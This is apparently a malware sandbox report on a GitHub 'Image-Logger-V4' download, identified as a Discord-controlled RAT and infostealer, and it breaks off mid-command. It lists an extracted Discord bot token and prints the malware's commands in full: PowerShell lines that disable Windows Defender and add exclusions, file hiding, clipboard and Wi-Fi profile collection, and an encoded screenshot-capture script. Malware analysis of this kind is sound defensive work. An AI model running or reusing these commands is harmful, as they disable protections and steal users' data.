Analysis

  • max time kernel
    1799s
  • max time network
    1772s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240412-en
  • resource tags

    arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    24-04-2024 04:01

General

  • Target

    https://github.com/Ghazouai/Image-Logger-V4

Malware Config

Extracted

Family

discordrat

Attributes
  • discord_token

    MTE5MzQ4MTk4Mzc5MjI1NTA1Ng.G4n7Tu.-ruWZdF2N09-odd0zZspsBjCwqwTg6xYcP4MSg

  • server_id

    1193474814220967958

Signatures

  • Discord RAT

    A RAT written in C# using Discord as a C2.

  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 59 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 14 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 1 IoCs
  • NTFS ADS 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 28 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/Ghazouai/Image-Logger-V4
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4228
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe8d3cab58,0x7ffe8d3cab68,0x7ffe8d3cab78
      2⤵
        PID:4792
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1516 --field-trial-handle=1764,i,14264490790071459491,8762418114755571635,131072 /prefetch:2
        2⤵
          PID:4196
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1764,i,14264490790071459491,8762418114755571635,131072 /prefetch:8
          2⤵
            PID:4036
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2124 --field-trial-handle=1764,i,14264490790071459491,8762418114755571635,131072 /prefetch:8
            2⤵
              PID:428
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2996 --field-trial-handle=1764,i,14264490790071459491,8762418114755571635,131072 /prefetch:1
              2⤵
                PID:4012
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3008 --field-trial-handle=1764,i,14264490790071459491,8762418114755571635,131072 /prefetch:1
                2⤵
                  PID:4484
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4372 --field-trial-handle=1764,i,14264490790071459491,8762418114755571635,131072 /prefetch:8
                  2⤵
                    PID:2616
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4420 --field-trial-handle=1764,i,14264490790071459491,8762418114755571635,131072 /prefetch:8
                    2⤵
                      PID:2776
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4528 --field-trial-handle=1764,i,14264490790071459491,8762418114755571635,131072 /prefetch:8
                      2⤵
                      • NTFS ADS
                      PID:1148
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5004 --field-trial-handle=1764,i,14264490790071459491,8762418114755571635,131072 /prefetch:8
                      2⤵
                        PID:3136
                    • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                      "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                      1⤵
                        PID:3296
                      • C:\Windows\System32\rundll32.exe
                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                        1⤵
                          PID:3692
                        • C:\Users\Admin\Downloads\Image-Logger-V4-main\Image-Logger-V4-main\ImageLoggerV4.exe
                          "C:\Users\Admin\Downloads\Image-Logger-V4-main\Image-Logger-V4-main\ImageLoggerV4.exe"
                          1⤵
                            PID:2940
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\IMAGELOGGERA.exe
                              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\IMAGELOGGERA.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:2672
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\IMAGELOGGERA.exe
                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\IMAGELOGGERA.exe"
                                3⤵
                                • Drops file in Drivers directory
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:3116
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\IMAGELOGGERA.exe'"
                                  4⤵
                                    PID:3348
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\IMAGELOGGERA.exe'
                                      5⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:4856
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                    4⤵
                                      PID:1200
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                        5⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:3712
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Modules not found', 0, 'Error 404', 0+16);close()""
                                      4⤵
                                        PID:4112
                                        • C:\Windows\system32\mshta.exe
                                          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Modules not found', 0, 'Error 404', 0+16);close()"
                                          5⤵
                                            PID:976
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                          4⤵
                                            PID:4800
                                            • C:\Windows\system32\tasklist.exe
                                              tasklist /FO LIST
                                              5⤵
                                              • Enumerates processes with tasklist
                                              PID:2796
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                            4⤵
                                              PID:3144
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic csproduct get uuid
                                                5⤵
                                                  PID:4572
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                                4⤵
                                                  PID:1812
                                                  • C:\Windows\system32\reg.exe
                                                    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                                    5⤵
                                                      PID:3948
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                                    4⤵
                                                      PID:3132
                                                      • C:\Windows\system32\reg.exe
                                                        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                        5⤵
                                                          PID:580
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                        4⤵
                                                          PID:4552
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic path win32_VideoController get name
                                                            5⤵
                                                            • Detects videocard installed
                                                            PID:2424
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                          4⤵
                                                            PID:1292
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              wmic path win32_VideoController get name
                                                              5⤵
                                                              • Detects videocard installed
                                                              PID:4572
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RarSFX0\IMAGELOGGERA.exe""
                                                            4⤵
                                                              PID:2684
                                                              • C:\Windows\system32\attrib.exe
                                                                attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RarSFX0\IMAGELOGGERA.exe"
                                                                5⤵
                                                                • Views/modifies file attributes
                                                                PID:4736
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‏‍ .scr'"
                                                              4⤵
                                                                PID:1300
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‏‍ .scr'
                                                                  5⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:2256
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                4⤵
                                                                  PID:4728
                                                                  • C:\Windows\system32\tasklist.exe
                                                                    tasklist /FO LIST
                                                                    5⤵
                                                                    • Enumerates processes with tasklist
                                                                    PID:2872
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                  4⤵
                                                                    PID:472
                                                                    • C:\Windows\system32\tasklist.exe
                                                                      tasklist /FO LIST
                                                                      5⤵
                                                                      • Enumerates processes with tasklist
                                                                      PID:2808
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                    4⤵
                                                                      PID:1356
                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                        5⤵
                                                                          PID:5384
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                        4⤵
                                                                          PID:2264
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell Get-Clipboard
                                                                            5⤵
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:5428
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                          4⤵
                                                                            PID:4224
                                                                            • C:\Windows\system32\tasklist.exe
                                                                              tasklist /FO LIST
                                                                              5⤵
                                                                              • Enumerates processes with tasklist
                                                                              PID:5476
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                            4⤵
                                                                              PID:2796
                                                                              • C:\Windows\system32\tree.com
                                                                                tree /A /F
                                                                                5⤵
                                                                                  PID:5576
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                4⤵
                                                                                  PID:5052
                                                                                  • C:\Windows\system32\netsh.exe
                                                                                    netsh wlan show profile
                                                                                    5⤵
                                                                                      PID:5456
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                    4⤵
                                                                                      PID:2272
                                                                                      • C:\Windows\system32\systeminfo.exe
                                                                                        systeminfo
                                                                                        5⤵
                                                                                        • Gathers system information
                                                                                        PID:5464
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                                      4⤵
                                                                                        PID:4572
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                                          5⤵
                                                                                            PID:5528
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                          4⤵
                                                                                            PID:4504
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAK